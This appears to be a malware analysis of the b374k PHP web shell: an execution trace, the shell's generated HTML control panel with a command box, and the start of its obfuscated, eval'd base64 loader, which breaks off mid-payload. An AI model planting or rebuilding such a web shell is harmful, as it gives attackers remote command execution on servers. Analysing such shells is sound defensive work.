4 112 0 0.012193 704008 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
5 113 0 0.012206 704008 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 113 1 0.012221 704104
5 113 R '.htaccess'
4 112 1 0.012235 704008
4 112 R '.htaccess'
4 114 0 0.012249 704232 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
5 115 0 0.012262 704232 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 115 1 0.012276 704328
5 115 R '.htaccess'
4 114 1 0.012290 704232
4 114 R '.htaccess'
4 116 0 0.012303 704648 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
5 117 0 0.012316 704648 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 117 1 0.012330 704744
5 117 R '.htaccess'
4 116 1 0.012346 704648
4 116 R '.htaccess'
4 118 0 0.012359 704648 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
5 119 0 0.012372 704648 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 119 1 0.012386 704744
5 119 R '.htaccess'
4 118 1 0.012399 704648
4 118 R '.htaccess'
4 120 0 0.012413 704776 ukuran 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 0 0.012433 704776 filesize 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 1 0.012450 704832
5 121 R 64
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $size = 64
4 120 1 0.012475 704792
4 120 R 64
4 122 0 0.012488 704792 get_perms 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 0 0.012502 704792 fileperms 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 1 0.012516 704832
5 123 R 33188
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mode = 33188
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 122 1 0.012635 704832
4 122 R 'rw-r--r--'
4 124 0 0.012649 704920 filemtime 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 124 1 0.012663 704960
4 124 R 1676255756
4 125 0 0.012676 704920 date 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676255756
4 125 1 0.012709 705248
4 125 R '12-Feb-2023 21:35'
4 126 0 0.012724 705048 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
5 127 0 0.012737 705048 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 127 1 0.012752 705144
5 127 R '.htaccess'
4 126 1 0.012766 705048
4 126 R '.htaccess'
4 128 0 0.012779 705048 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '.htaccess'
5 129 0 0.012792 705048 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 129 1 0.012806 705144
5 129 R '.htaccess'
4 128 1 0.012819 705048
4 128 R '.htaccess'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '<tr><td><a id=".htaccess_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/.htaccess">.htaccess</a> <form action="?y=/var/www/html/uploads/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/b374k.php'
4 130 0 0.012871 708120 fileowner 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
4 130 1 0.012887 708144
4 130 R 1000
4 131 0 0.012900 708104 posix_getpwuid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 1000
4 131 1 0.012932 708920
4 131 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $name = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4 132 0 0.012976 708120 filegroup 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
4 132 1 0.012991 708160
4 132 R 1000
4 133 0 0.013004 708120 posix_getgrgid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 1000
4 133 1 0.013035 708776
4 133 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $group = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $owner = 'osboxes<span class="gaya"> : </span>osboxes'
4 134 0 0.013086 708136 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
5 135 0 0.013104 708136 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'b374k.php'
5 135 1 0.013119 708232
5 135 R 'b374k.php'
4 134 1 0.013133 708136
4 134 R 'b374k.php'
4 136 0 0.013148 708360 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
5 137 0 0.013160 708360 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'b374k.php'
5 137 1 0.013175 708456
5 137 R 'b374k.php'
4 136 1 0.013189 708360
4 136 R 'b374k.php'
4 138 0 0.013203 708776 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
5 139 0 0.013216 708776 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'b374k.php'
5 139 1 0.013231 708872
5 139 R 'b374k.php'
4 138 1 0.013244 708776
4 138 R 'b374k.php'
4 140 0 0.013258 708776 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
5 141 0 0.013271 708776 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'b374k.php'
5 141 1 0.013286 708872
5 141 R 'b374k.php'
4 140 1 0.013299 708776
4 140 R 'b374k.php'
4 142 0 0.013312 708904 ukuran 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/b374k.php'
5 143 0 0.013326 708904 filesize 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/b374k.php'
5 143 1 0.013342 708960
5 143 R 14428
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $size = 14428
5 144 0 0.013368 708920 round 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 14.08984375 2
5 144 1 0.013384 708992
5 144 R 14.09
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $size = 14.09
4 142 1 0.013410 708960
4 142 R '14.09 kb'
4 145 0 0.013425 708920 get_perms 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/b374k.php'
5 146 0 0.013438 708920 fileperms 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/b374k.php'
5 146 1 0.013452 708960
5 146 R 33204
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mode = 33204
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 145 1 0.013572 708960
4 145 R 'rw-rw-r--'
4 147 0 0.013587 709048 filemtime 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/b374k.php'
4 147 1 0.013601 709088
4 147 R 1676255756
4 148 0 0.013614 709048 date 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676255756
4 148 1 0.013646 709376
4 148 R '12-Feb-2023 21:35'
4 149 0 0.013661 709176 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
5 150 0 0.013675 709176 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'b374k.php'
5 150 1 0.013690 709272
5 150 R 'b374k.php'
4 149 1 0.013704 709176
4 149 R 'b374k.php'
4 151 0 0.013717 709176 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'b374k.php'
5 152 0 0.013731 709176 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'b374k.php'
5 152 1 0.013745 709272
5 152 R 'b374k.php'
4 151 1 0.013759 709176
4 151 R 'b374k.php'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="b374k.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/b374k.php">b374k.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="b374k.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="b374k.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="b374k.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/prepend.php'
4 153 0 0.013816 708160 fileowner 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
4 153 1 0.013832 708184
4 153 R 0
4 154 0 0.013845 708144 posix_getpwuid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 154 1 0.013869 708944
4 154 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 155 0 0.013911 708128 filegroup 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
4 155 1 0.013925 708168
4 155 R 0
4 156 0 0.013938 708128 posix_getgrgid 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 0
4 156 1 0.013960 708784
4 156 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 157 0 0.014011 708112 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
5 158 0 0.014025 708112 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 158 1 0.014039 708208
5 158 R 'prepend.php'
4 157 1 0.014054 708112
4 157 R 'prepend.php'
4 159 0 0.014068 708336 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
5 160 0 0.014082 708336 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 160 1 0.014097 708432
5 160 R 'prepend.php'
4 159 1 0.014111 708336
4 159 R 'prepend.php'
4 161 0 0.014125 708752 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
5 162 0 0.014138 708752 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 162 1 0.014152 708848
5 162 R 'prepend.php'
4 161 1 0.014166 708752
4 161 R 'prepend.php'
4 163 0 0.014179 708752 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
5 164 0 0.014192 708752 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 164 1 0.014207 708848
5 164 R 'prepend.php'
4 163 1 0.014220 708752
4 163 R 'prepend.php'
4 165 0 0.014233 708880 ukuran 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 166 0 0.014246 708880 filesize 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 166 1 0.014263 708944
5 166 R 57
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $size = 57
4 165 1 0.014287 708904
4 165 R 57
4 167 0 0.014301 708904 get_perms 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 168 0 0.014315 708904 fileperms 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 168 1 0.014329 708944
5 168 R 33261
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $mode = 33261
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $perms .= 'x'
4 167 1 0.014455 708944
4 167 R 'rwxr-xr-x'
4 169 0 0.014469 709032 filemtime 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 169 1 0.014484 709072
4 169 R 1676255756
4 170 0 0.014497 709032 date 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676255756
4 170 1 0.014529 709360
4 170 R '12-Feb-2023 21:35'
4 171 0 0.014544 709160 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
5 172 0 0.014558 709160 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 172 1 0.014572 709256
5 172 R 'prepend.php'
4 171 1 0.014587 709160
4 171 R 'prepend.php'
4 173 0 0.014601 709160 clearspace 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'prepend.php'
5 174 0 0.014614 709160 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 174 1 0.014628 709256
5 174 R 'prepend.php'
4 173 1 0.014642 709160
4 173 R 'prepend.php'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="prepend.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/prepend.php">prepend.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="prepend.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="prepend.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="prepend.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class='
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff .= '</table>'
3 45 1 0.014694 704808
3 45 R ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 8 1 0.014888 712600
1 3 1 0.014914 554376
0.014948 462720
TRACE END [2023-02-13 00:36:22.450827]
Generated HTML code
<html><head><title>:: b374k m1n1 1.01 ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onload="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tbody><tr> <td><table class="b_tbl"><tbody><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 1.01</td></tr></tbody></table></td> <td>Apache/2.4.52 (Ubuntu)<br>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br>server ip : 127.0.0.1 <span class="gaya">|</span> your ip : ::1<br>safemode <span class="gaya">OFF<span><br> > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a></span></span></td> </tr></tbody></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?y=/var/www/html/">explore</a> <a href="?y=/var/www/html/&x=shell">shell</a> <a href="?y=/var/www/html/&x=php">eval</a> <a href="?y=/var/www/html/&x=mysql">mysql</a> <a href="?y=/var/www/html/&x=phpinfo">phpinfo</a> <a href="?y=/var/www/html/&x=netsploit">netsploit</a> <a href="?y=/var/www/html/&x=upload">upload</a> <a href="?y=/var/www/html/&x=mail">mail</a> </div> <!-- menu end --> <form action="?y=/var/www/html/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tbody><tr><td>www-data $ </td><td><input onmouseover="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value=""><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;"></td></tr> <form action="?" method="get" style="margin:8px 0 0 0;"></form> <input type="hidden" name="y" value="/var/www/html/"> <tr><td>view file/folder</td><td><input onmouseover="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="/var/www/html/"><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;"></td></tr> </tbody></table><table class="explore"> <tbody><tr><th>name</th><th style="width:80px;">size</th><th style="width:210px;">owner:group</th><th style="width:80px;">perms</th><th style="width:110px;">modified</th><th style="width:190px;">actions</th></tr> <tr><td><a href="?y=/var/www/html/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 21:35</td><td><span id="titik1"><a href="?y=/var/www/html/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar('titik1','titik1_form');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" value="/var/www/html/"> <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder"> <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !"> </form></td></tr> <tr><td><a href="?y=/var/www/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 21:35</td><td><span id="titik2"><a href="?y=/var/www/html/&edit=/var/www/newfile.php">newfile</a> | <a href="javascript:tukar('titik2','titik2_form');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" value="/var/www/html/"> <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder"> <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !"> </form> </td></tr><tr><td><a id="b374k.php_link" href="?y=/var/www/html/&view=/var/www/html/b374k.php">b374k.php</a> <form action="?y=/var/www/html/" method="post" id="b374k.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="b374k.php" style="margin:0;padding:0;"> <input class="inputz" style="width:200px;" type="text" name="newname" value="b374k.php"> <input class="inputzbut" type="submit" name="rename" value="rename"> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('b374k.php_link','b374k.php_form');"> </form> </td><td>14.09 kb</td><td style="text-align:center;">osboxes<span class="gaya"> : </span>osboxes</td><td>rw-rw-r--</td><td style="text-align:center;">12-Feb-2023 21:35</td> <td><a href="?y=/var/www/html/&edit=/var/www/html/b374k.php">edit</a> | <a href="javascript:tukar('b374k.php_link','b374k.php_form');">rename</a> | <a href="?y=/var/www/html/&delete=/var/www/html/b374k.php">delete</a> | <a href="?y=/var/www/html/&dl=/var/www/html/b374k.php">download</a> (<a href="?y=/var/www/html/&dlgzip=/var/www/html/b374k.php">gzip</a>)</td></tr><tr><td><a id="beneri.se_malware_analysis_link" href="?y=/var/www/html/&view=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> <form action="?y=/var/www/html/" method="post" id="beneri.se_malware_analysis_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="beneri.se_malware_analysis" style="margin:0;padding:0;"> <input class="inputz" style="width:200px;" type="text" name="newname" value="beneri.se_malware_analysis"> <input class="inputzbut" type="submit" name="rename" value="rename"> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('beneri.se_malware_analysis_link','beneri.se_malware_analysis_form');"> </form> </td><td>???</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rw-r--r--</td><td style="text-align:center;">12-Feb-2023 21:35</td> <td><a href="?y=/var/www/html/&edit=/var/www/html/beneri.se_malware_analysis">edit</a> | <a href="javascript:tukar('beneri.se_malware_analysis_link','beneri.se_malware_analysis_form');">rename</a> | <a href="?y=/var/www/html/&delete=/var/www/html/beneri.se_malware_analysis">delete</a> | <a href="?y=/var/www/html/&dl=/var/www/html/beneri.se_malware_analysis">download</a> (<a href="?y=/var/www/html/&dlgzip=/var/www/html/beneri.se_malware_analysis">gzip</a>)</td></tr></tbody></table> </form></div> </body></html>Original PHP code
<?php
@error_reporting(0);
@set_time_limit(0);
$code = "7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770
t7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC
ZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl
iTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS
syppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z
UYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP
nqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc2MoihJ/i2VRMQU2fRVM3VRHaEsIh6qh
bMFiubRwIzqiHhkPkIapTR3dVD5Aokq8mRFdMmkPUXjWRScJ/WfRfLpPPbGy8gtiUpluog0diKrG
b+Qn9n9v+aQ8XQNNFAVoH/WYUXxurLuqnmE1lsiLqtmf3/YnkAicieqnWOCG2qs1OtfnUatTa3XK
zCu3W+0Lik27pwIQJ0ZP66pOJyCduCLYrIN7xbcOeoAbGwmwIR6hCG3Egqg4lQyqqrt28qxbxDIo
k18qXrSo0bOb5qgnj6GjO0whzFW5JgqvPG/XQW4ICI7LlaW0THVeH/izURFJoJYvsNyPMh5I/6d6
TorssY6yrE5K35kyUkONIOqK3rGFolLnB5MIi7CwOEE+BH6BVpN4f1kYeHiBXcnQtoU4Ra0w0WzJ
1REfUIZorikUCrStRWF0hcDgdoNYc1zYdzNpQNiUKX9YEnI7bBpNEniiJjdRJvVmttBvNh6dW9ab
cLKNH1hPha1DxJyyFRq6LpsETpOH5iWvDIHEV/jjwi2GNiDMNR/K1BMw7JF2/QNaYm5KQlFwD8uD
ktfHnDCJc30YFZU1IuJI1QEBlMSk+oiGWPGHNUH1fdTegmUhAGNBMNnwkKyUeIKSUjzEMBiaZnpB
CpDqUBM1V+0iK/TxD84kv+EUsfRZEWjhIF0GUr40RIh4PfS4ywkXr8BzJEmRD8jxUz0CaSQg1V9d
hGgBKIiodKSf8cpiWStCEXxnL9EeWDLL4Cc1rD+kDEYTzFKaeMxkBE4DyWQ00cAeYU9CgQNLCHGF
pwVRUXSQ1nnSHMoBme35vRuT8E5EWn8Wzdvvm6azRamNRuGbOCHwAsN6sXjXa1afyyUkTS+mebim
O7fpYGuWzubzIJT45iEiQ08vvbQ8p93gcl8Swa5LOKvgzcg06ARDjJNZ09JIRgFOFQwH0gd3Hc9B
DAh4nb27iuY34cs6Xe2blnoXDIygNjzwsDDng+bz2/MuqKcTaE8dmGAvYGMAHBJH+C5ozYhwylA6
